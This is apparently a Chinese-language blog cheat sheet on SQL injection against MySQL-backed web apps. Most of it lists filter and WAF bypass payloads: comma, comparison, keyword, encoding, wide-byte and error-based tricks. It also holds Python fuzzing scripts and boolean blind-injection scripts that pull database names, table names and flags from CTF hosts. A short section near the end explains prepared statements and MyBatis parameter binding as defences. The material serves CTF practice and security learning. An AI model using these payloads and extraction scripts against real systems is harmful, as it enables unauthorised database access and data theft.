在使用盲注的时候，需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决：

select substr(database() from 1 for 1); # for 1显示1个字符 from 1从第一个开始显示
select mid(database() from 1 for 1);

对于limit可以使用offset来绕过：

select * from news limit 0,1# 等价于下面这条SQL语句
select * from news limit 1 offset 0

# case when then
1 mysql> select case when 1=1 then sleep(2) else 0 end;
2 +----------------------------------------+
3 | case when 1=1 then sleep(2) else 0 end |
4 +----------------------------------------+
5 | 0                                      |
6 +----------------------------------------+
7 row in set (2.00 sec)

# join
union select 1,2,3,4;
union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D);
union select * from ((select 1)A join (select 2)B join (select 3)C join (select group_concat(user(),' ',database(),' ',@@datadir))D);

- - -

- 8 比较符号-尖括号过滤绕过<>

同样是在使用盲注的时候，在使用二分查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符，那么就需要使用到greatest来进行绕过了。

最常见的一个盲注的sql语句：

select * from users where id=1 and ascii(substr(database(),0,1))>64

此时如果比较操作符被过滤，上面的盲注语句则无法使用,那么就可以使用greatest来代替比较操作符了。greatest(n1,n2,n3,...)函数返回输入参数(n1,n2,n3,...)的最大值。

那么上面的这条sql语句可以使用greatest变为如下的子句:

select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

- - -

- 9 =绕过

like绕过 =

1 2	?id=1' or 1 like 1 绕过对“=”，“>”等的过滤

- - -

- 10 union，select，where等绕过

（1）使用注释符绕过：

常用注释符：

//，-- , /**/, #, --+, -- -, ;,%00,--a

用法：

U/**/NION/**/SE/**/LECT/**/user，pwd from user

（2）使用大小写绕过：

id=-1'UnIoN/**/SeLeCT

（3）内联注释绕过：

id=-1'/*!UnIoN*/SeLeCT1,2,concat(/*!table_name*/) FrOM/*information_schema*/.tables/*!WHERE*//*!TaBlE_ScHeMa*/like database()#

## （4） 双关键字绕过：

id=-1'UNIunionONSeLselectECT1,2,3–-

- - - - -

- 10.通用绕过（编码）：

如URLEncode编码，ASCII,HEX,unicode编码绕过：

or1=1即%6f%72%20%31%3d%31，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。

- -

- 11 等价函数绕过

hex()、bin()==>ascii()

sleep()==>benchmark()

concat_ws()==>group_concat()

mid()、substr()==>substring() @@user==>user() @@datadir==>datadir()

举例：substring()和substr()无法使用时：?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74或者：

substr((select'password'),1,1)=0x70strcmp(left('password',1),0x69)=1strcmp(left('password',1),0x70)=0strcmp(left('password',1),0x71)=-1

- - -

- 12 宽字节绕过

过滤单引号时，可以试试宽字节
%bf%27 %df%27 %aa%27


过滤 ' 的时候往往利用的思路是将 ' 转换为 \' 。
在 mysql 中使用 GBK 编码的时候，会认为两个字符为一个汉字，一般有两种思路：

（1）%df 吃掉 \ 具体的方法是 urlencode('\) = %5c%27，我们在 %5c%27 前面添加 %df ，形成 %df%5c%27 ，而 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字，%df%5c 就是一个汉字，%27 作为一个单独的（'）符号在外面：
id=-1%df%27union select 1,user(),3--+

（2）将 \' 中的 \ 过滤掉，例如可以构造 %**%5c%5c%27 ，后面的 %5c 会被前面的 %5c 注释掉。
一般产生宽字节注入的PHP函数：
1.replace（）：过滤 ' \ ，将 ' 转化为 \' ，将 \  转为 \\，将 " 转为 \" 。用思路一。
2.addslaches()：返回在预定义字符之前添加反斜杠（\）的字符串。预定义字符：' , " , \ 。用思路一
（防御此漏洞，要将 mysql_query 设置为 binary 的方式）

3.mysql_real_escape_string()：转义下列字符：
\x00    \n    \r    \'"    \x1a
（防御，将mysql设置为gbk即可）

- - - - - - -

- * 万能密钥绕过

1	用经典的or 1=1判断绕过,如or ‘swords’ =’swords

- - -

- 8 +,-,.号拆解字符串绕过

1 2	?id=1' or '11+11'='11+11' "-"和"."

- - - - -

- 10 in绕过

1	or '1' IN ('swords')

- - -

- 11 >,

1 2	or 'password' > 'pass' or 1<3

- - -

- 12 等价函数与命令绕过

1.函数或变量

hex()、bin() ==> ascii()
sleep() ==>benchmark()
concat_ws()==>group_concat()
mid()、substr() ==> substring()
@@user ==> user()
@@datadir ==> datadir()

举例：substring()和substr()无法使用时：
?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74　
或者：
substr((select 'password'),1,1) = 0x70strcmp(left('password',1), 0x69) = 1strcmp(left('password',1), 0x70) = 0strcmp(left('password',1), 0x71) = -1

- -

2.符号

1	and和or有可能不能使用，可以试下&&和\|\|=不能使用的情况，可以考虑尝试

- -

3.生僻函数

MySQL/PostgreSQL支持XML函数：
Select UpdateXML(‘ ’,’/script/@x/’,’src=//evil.com’);　　　　　　　　　　
?id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1))

SELECT xmlelement(name img,xmlattributes(1as src,'a\l\x65rt(1)'as \117n\x65rror));　//postgresql

?id=1 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));and 1=(updatexml(1,concat(0x5c,(select user()),0x5c),1))and extractvalue(1, concat(0x5c, (select user()),0x5c))

- - -

- 13 反引号`绕过

1	select `version()`，可以用来过空格和正则，特殊情况下还可以将其做注释符用

- - -

- 14 换行符绕过

%0a、%0d

- - -

- 15 截断绕过

1
2
3

%00,%0A,?,/0,........,%80-%99
目录字符串，在window下256字节、linux下4096字节时会达到最大值，最大值长度之后的字符将被丢弃。
././././././././././././././././abcabc..1/abc/../1/abc/../1/abc

- - - - -

- 17 \N绕过

\N其实相当于NULL字符

select * from users where id=8E0union select 1,2,3,4,5,6,7,8,9,0
select * from users where id=8.0union select 1,2,3,4,5,6,7,8,9,0
select * from users where id=\Nunion select 1,2,3,4,5,6,7,8,9,0

- - -

- 18 特殊的绕过函数

1. 通过greatest函数绕过不能使用大小于符号的情况
greatest(a,b)，返回a和b中较大的那个数。当我们要猜解user()第一个字符的ascii码是否小于等于150时，可使用：
mysql> select greatest(ascii(mid(user(),1,1)),150)=150; 
+------------------------------------------+
| greatest(ascii(mid(user(),1,1)),150)=150 | 
+------------------------------------------+
|                                        1 | 
+------------------------------------------+
如果小于150，则上述返回值为True。

2. 通过substr函数绕过不能使用逗号的情况
mid(user() from 1 for 1)或substr(user() from 1 for 1)
mysql> select ascii(substr(user() from 1 for 1)) < 150; 
+------------------------------------------+
| ascii(substr(user() from 1 for 1)) < 150 | 
+------------------------------------------+
|                                        1 | 
+------------------------------------------+

3.使用数学运算函数在子查询中报错
exp(x)函数的作用： 取常数e的x次方，其中，e是自然对数的底。
~x 是一个一元运算符，将x按位取补

select exp(~(select*from(select user())a))mysql报错：
mysql> select exp(~(select*from(select user())a));
ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(~((select ‘root@localhost’ from dual)))’
这条查询会出错，是因为exp(x)的参数x过大，超过了数值范围，分解到子查询，就是：(select*from(select user())a) 
得到字符串 root@localhost表达式’root@localhost’被转换为0，按位取补之后得到一个非常的大数，它是MySQL中最大的无符号整数

- - - - -

- mysql黑魔法绕过

select{x user}from {x mysql.user};

select user from mysql.user where 1=\Nunion select@1;

select user from mysql.user where 1=\Nunion select-.1;

select~2.1from xxxx

select-2.1from xxx

select~2e1from xxx

1	if((select%0b(select(xxx)``from(xxx))regexp(0x5e61)),(`sleep`(5)),0)

- - - - - - -

- 2、过滤闭合

- -

- 1 过滤关键字

1 过滤关键字   and or

    php代码   preg_match('/(and|or)/i',$id)

    会过滤的攻击代码    1 or 1=1 1 and 1=1

    绕过方式    1 || 1=1 1 && 1=1

2 过滤关键字   and or union

    php代码   preg_match('/(and|or|union)/i',$id)

    会过滤的攻击代码    union select user,password from users

    绕过方式    1 && (select user from users where userid=1)='admin'

3 过滤关键字   and or union where

    php代码   preg_match('/(and|or|union|where)/i',$id)

    会过滤的攻击代码    1 && (select user from users where user_id = 1) = 'admin'

    绕过方式    1 && (select user from users limit 1) = 'admin'

4 过滤关键字   and or union where

    php代码   preg_match('/(and|or|union|where)/i',$id)

    会过滤的攻击代码    1 && (select user from users where user_id = 1) = 'admin'

    绕过方式    1 && (select user from users limit 1) = 'admin'

5 过滤关键字   and, or, union, where, limit

    php代码   preg_match('/(and|or|union|where|limit)/i', $id)

    会过滤的攻击代码    1 && (select user from users limit 1) = 'admin'

    绕过方式    1 && (select user from users group by user_id having user_id = 1) = 'admin'#user_id聚合中user_id为1的user为admin

6 过滤关键字   and, or, union, where, limit, group by

    php代码   preg_match('/(and|or|union|where|limit|group by)/i', $id)

    会过滤的攻击代码    1 && (select user from users group by user_id having user_id = 1) = 'admin'

    绕过方式    1 && (select substr(group_concat(user_id),1,1) user from users ) = 1

7 过滤关键字   and, or, union, where, limit, group by, select

    php代码   preg_match('/(and|or|union|where|limit|group by|select)/i', $id)

    会过滤的攻击代码    1 && (select substr(gruop_concat(user_id),1,1) user from users) = 1

    绕过方式    1 && substr(user,1,1) = 'a'

8 过滤关键字   and, or, union, where, limit, group by, select, '

    php代码   preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)

    会过滤的攻击代码    1 && (select substr(gruop_concat(user_id),1,1) user from users) = 1

    绕过方式    1 && user_id is not null 1 && substr(user,1,1) = 0x61 1 && substr(user,1,1) = unhex(61)

9 过滤关键字   and, or, union, where, limit, group by, select, ', hex

    php代码   preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)

    会过滤的攻击代码    1 && substr(user,1,1) = unhex(61)

    绕过方式    1 &&substr(user,1,1) =lower(conv(11,10,16)) #十进制的11转化为十六进制，并小写。

10 过滤关键字and,or,union,where,limit,groupby,select,', hex, substr

    php代码   preg_match('/(and|or|union|where|limit|groupby|select|\'|hex|substr)/i', $id)

    会过滤的攻击代码    1 &&substr(user,1,1) =lower(conv(11,10,16))/td>

    绕过方式    1 &&lpad(user,7,1)

11 过滤关键字and,or,union,where,limit,groupby,select,', hex, substr, 空格

    php代码   preg_match('/(and|or|union|where|limit|groupby|select|\'|hex|substr|\s)/i', $id)

    会过滤的攻击代码    1 &&lpad(user,7,1)/td>

    绕过方式    1%0b||%0blpad(user,7,1)

12 过滤关键字andorunionwhere

    php代码   preg_match('/(and|or|union|where)/i',$id)

    会过滤的攻击代码    1 || (selectuserfromuserswhereuser_id = 1) ='admin'

    绕过方式    1 || (selectuserfromuserslimit1) ='admin'

- - - - -

- 0x03 FUZZ

- -

- 1 过滤字符的FUZZ

get

import requests

sql_char = ['select',
			'union',
			'and',
			'or',
			'sleep',
			'where',
			'from',
			'limit',
			'group',
			'by',
			'like',
			'prepare',
			'as',
			'if',
			'char',
			'ascii',
			'mid',
			'left',
			'right',
			'substring',
			'handler',
			'updatexml',
			'extractvalue',
			'benchmark',
			'insert',
			'update',
			'all',
			'@',
			'#',
			'^',
			'&',
			'*',
			'\'',
			'"',
			'~',
			'`',
			'(',
			')',
			'--',
			'=',
			'/',
			'\\',
			' ']

for char in sql_char:
	res = requests.get("http://127.0.0.1/get.php?query="+char+"&submit2=sbumit")
	if 'Illegal Char' in res.text:
		print("该字符是非法字符: {0}".format(char))
	else:
		print("通过: {0}".format(char))

- -

post

import requests

sql_char = ['select',
			'union',
			'and',
			'or',
			'sleep',
			'where',
			'from',
			'limit',
			'group',
			'by',
			'like',
			'prepare',
			'as',
			'if',
			'char',
			'ascii',
			'mid',
			'left',
			'right',
			'substring',
			'handler',
			'updatexml',
			'extractvalue',
			'benchmark',
			'insert',
			'update',
			'all',
			'@',
			'#',
			'^',
			'&',
			'*',
			'\'',
			'"',
			'~',
			'`',
			'(',
			')',
			'--',
			'=',
			'/',
			'\\',
			' ']
url = "http://127.0.0.1/get.php"
header = {
	'Host':'127.0.0.1',
	'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0',
	'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
	'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
	'Accept-Encoding':'gzip, deflate',
	'Content-Type':'application/x-www-form-urlencoded'
}
for char in sql_char:
	post_data = "query=test"+char+"&submit2=sbumit"
	res = requests.post(url,data=post_data,headers=header)
	if 'Illegal Char' in res.text:
		print("该字符是非法字符: {0}".format(char))
	else:
		print("通过: {0}".format(char))

- - - - -

- etc1 SQL注入的防御

- -

- 1、检查变量数据类型和格式

- -

- 2、过滤特殊符号

　　对于无法确定固定格式的变量，一定要进行特殊符号过滤或转义处理。

- -

- 3、绑定变量，使用预编译语句

　　MySQL的mysqli驱动提供了预编译语句的支持，不同的程序语言，都分别有使用预编译语句的方法

- -

- etc2 预编译

- -

- 1 什么是sql预编译**

1.1：预编译语句是什么　

通常我们的一条sql在db接收到最终执行完毕返回可以分为下面三个过程：

词法和语义解析　　
优化sql语句，制定执行计划
执行并返回结果

我们把这种普通语句称作Immediate Statements。　　

1.2： MySQL的预编译功能

　　注意MySQL的老版本（4.1之前）是不支持服务端预编译的，但基于目前业界生产环境普遍情况，基本可以认为MySQL支持服务端预编译。

　下面我们来看一下MySQL中预编译语句的使用。
　　（1）建表首先我们有一张测试表t，结构如下所示：

mysql> show create table t\G
*************************** 1. row ***************************
       Table: t
Create Table: CREATE TABLE `t` (
  `a` int(11) DEFAULT NULL,
  `b` varchar(20) DEFAULT NULL,
  UNIQUE KEY `ab` (`a`,`b`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8

- - - -

　（2）编译

　　我们接下来通过 PREPARE stmt_name FROM preparable_stm的语法来预编译一条sql语句

1
2
3

mysql> prepare ins from 'insert into t select ?,?';
Query OK, 0 rows affected (0.00 sec)
Statement prepared

- -

　（3）执行

　　我们通过EXECUTE stmt_name [USING @var_name [, @var_name] ...]的语法来执行预编译语句

mysql> set @a=999,@b='hello';
Query OK, 0 rows affected (0.00 sec)
 
mysql> execute ins using @a,@b;
Query OK, 1 row affected (0.01 sec)
Records: 1  Duplicates: 0  Warnings: 0
 
mysql> select * from t;
+------+-------+
| a    | b     |
+------+-------+
|  999 | hello |
+------+-------+
1 row in set (0.00 sec)

- - - -

　　可以看到，数据已经被成功插入表中。

　　MySQL中的预编译语句作用域是session级，但我们可以通过max_prepared_stmt_count变量来控制全局最大的存储的预编译语句。

mysql> set @@global.max_prepared_stmt_count=1;
Query OK, 0 rows affected (0.00 sec)
 
mysql> prepare sel from 'select * from t';
ERROR 1461 (42000): Can't create more than max_prepared_stmt_count statements (current value: 1)

- -

当预编译条数已经达到阈值时可以看到MySQL会报如上所示的错误。

（4）释放
　　如果我们想要释放一条预编译语句，则可以使用{DEALLOCATE | DROP} PREPARE stmt_name的语法进行操作:

1 2	mysql> deallocate prepare ins; Query OK, 0 rows affected (0.00 sec)

- - -

- 2：为什么PrepareStatement可以防止sql注入

　（1）：为什么Statement会被sql注入

　　因为Statement之所以会被sql注入是因为SQL语句结构发生了变化。比如：

1 2	"select*from tablename where username='"+uesrname+ "'and password='"+password+"'"

- -

　　在用户输入’or true or’之后sql语句结构改变。

1	select*from tablename where username=''or true or'' and password=''

- -

　　这样本来是判断用户名和密码都匹配时才会计数，但是经过改变后变成了或的逻辑关系，不管用户名和密码是否匹配该式的返回值永远为true;

　（2）为什么Preparement可以防止SQL注入。

　　因为Preparement样式为

1	select*from tablename where username=? and password=?

- -

　　该SQL语句会在得到用户的输入之前先用数据库进行预编译，这样的话不管用户输入什么用户名和密码的判断始终都是并的逻辑关系，防止了SQL注入

- -

- 3：mybatis是如何防止SQL注入的

　　1、首先看一下下面两个sql语句的区别：

<select id="selectByNameAndPassword" parameterType="java.util.Map" resultMap="BaseResultMap">
select id, username, password, role
from user
where username = #{username,jdbcType=VARCHAR}
and password = #{password,jdbcType=VARCHAR}
</select>

- - - -

<select id="selectByNameAndPassword" parameterType="java.util.Map" resultMap="BaseResultMap">
select id, username, password, role
from user
where username = ${username,jdbcType=VARCHAR}
and password = ${password,jdbcType=VARCHAR}
</select>

- - - -

mybatis中的#和$的区别：

- -

- 4 mybatis是如何做到防止sql注入的

1	select id, username, password, role from user where username=? and password=?

- -

- 脚本

- -

- sql布尔盲注

url = "http://124.156.121.112:28069/?id=-1'/**/"
def db(url):                    #爆库名
    for i in range(1,5):
        for j in range(32,128):
            u= "or/**/ascii(substr(database()/**/from/**/"+str(i)+"/**/for/**/1))="+str(j)+"#"
            s = url+u
            print(s)
            r =  requests.get(s)
            if 'By Rudyard Kipling' in r.text:
                print(chr(j))
                
def table(url):                    #爆表名
    for i in range(4):
        table_name=''
        for j in range(1,6):
            for k in range(48,128):
                u=id="||/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/1/**/offset/**/"+str(i)+")/**/from/**/"+str(j)+"/**/for/**/1))="+str(k)+"#"
                s = url+u
                print(s)
                r =  requests.get(s)            
                if 'By Rudyard Kipling' in r.text:
                    table_name+=chr(k)
            print(table_name)

- - - -

import requests
s=requests.session()
url='https://46a0f98e-cdc3-413d-b67c-b2dbaeb5c4ec.chall.ctf.show/index.php'
table=""

for i in range(1,45):
    print(i)
    for j in range(31,128):
        #爆表名  flag
        payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #爆字段名 flag
        #payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #读取flag
        #payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))

        ra = s.get(url=url + '?id=0/**/or/**/' + payload).text

        if 'I asked nothing' in ra:
            table += chr(j)
            print(table)
            break

- - - -

import requests
s=requests.session()
url='http://ab7573d3-1de2-42bd-bc68-26aaca8af4dc.chall.ctf.show/index.php'
table=""

for i in range(1,45):
    print(i)
    for j in range(31,128):
        #爆表名  flag
        #payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #爆字段名 flag
        #payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #读取flag
        payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))

        ra = s.get(url=url + '?id=0/**/or/**/' + payload).text

        if 'I asked nothing' in ra:
            table += chr(j)
            print(table)
            break

- - - - - - - - - - - -

- SQL注入

- 0x00 SQL基本语法

- 0 表的用途

- 1 SELECT

- 2 INSERT

- 3 UPDATE

- 4 DELETE

- 5 基本函数

- 6 基本语句

- x 中间件容器解析的区别

- 不同数据库的注入判断

- 0x01 SQL注入基础

- 1 常规注入

- 3 基于时间的盲注

- 4 基于布尔的盲注

- 5 报错注入

- 6 宽字节注入

- 7 堆叠注入

- 8 创建/上传文件

- 9 搜索型注入

- 10 insert/update型注入点

- *sqlmap用法

- 0x02 绕过及过滤闭合

- 1、绕过

- 1 注释符绕过

- 2 or and 绕过

- 2 大小写绕过

- 3 内联注释绕过

- 4 双关键字绕过

- 5 编码绕过

- 6 空格绕过

- 7 逗号绕过

- 8 比较符号-尖括号过滤绕过<>

- 9 =绕过

- 10 union，select，where等绕过

- 10.通用绕过（编码）：

- 11 等价函数绕过

- 12 宽字节绕过

- * 万能密钥绕过

- 8 +,-,.号拆解字符串绕过

- 10 in绕过

- 11 >,

- 12 等价函数与命令绕过

- 13 反引号`绕过

- 14 换行符绕过

- 15 截断绕过

- 17 \N绕过

- 18 特殊的绕过函数

- mysql黑魔法绕过

- 2、过滤闭合

- 1 过滤关键字

- 0x03 FUZZ

- 1 过滤字符的FUZZ

- etc1 SQL注入的防御

- 1、检查变量数据类型和格式

- 2、过滤特殊符号

- 3、绑定变量，使用预编译语句

- etc2 预编译

- 1 什么是sql预编译**

- 2：为什么PrepareStatement可以防止sql注入

- 3：mybatis是如何防止SQL注入的

- 4 mybatis是如何做到防止sql注入的

- 脚本

- sql布尔盲注

- Quick Start

- Create a new post

- Run server

- Generate static files

- Deploy to remote sites

- SQL注入

- 0x00 SQL基本语法

- 0 表的用途

- 1 SELECT

- 2 INSERT

- 3 UPDATE

- 4 DELETE

- 5 基本函数

- 6 基本语句

- x 中间件容器解析的区别

- 不同数据库的注入判断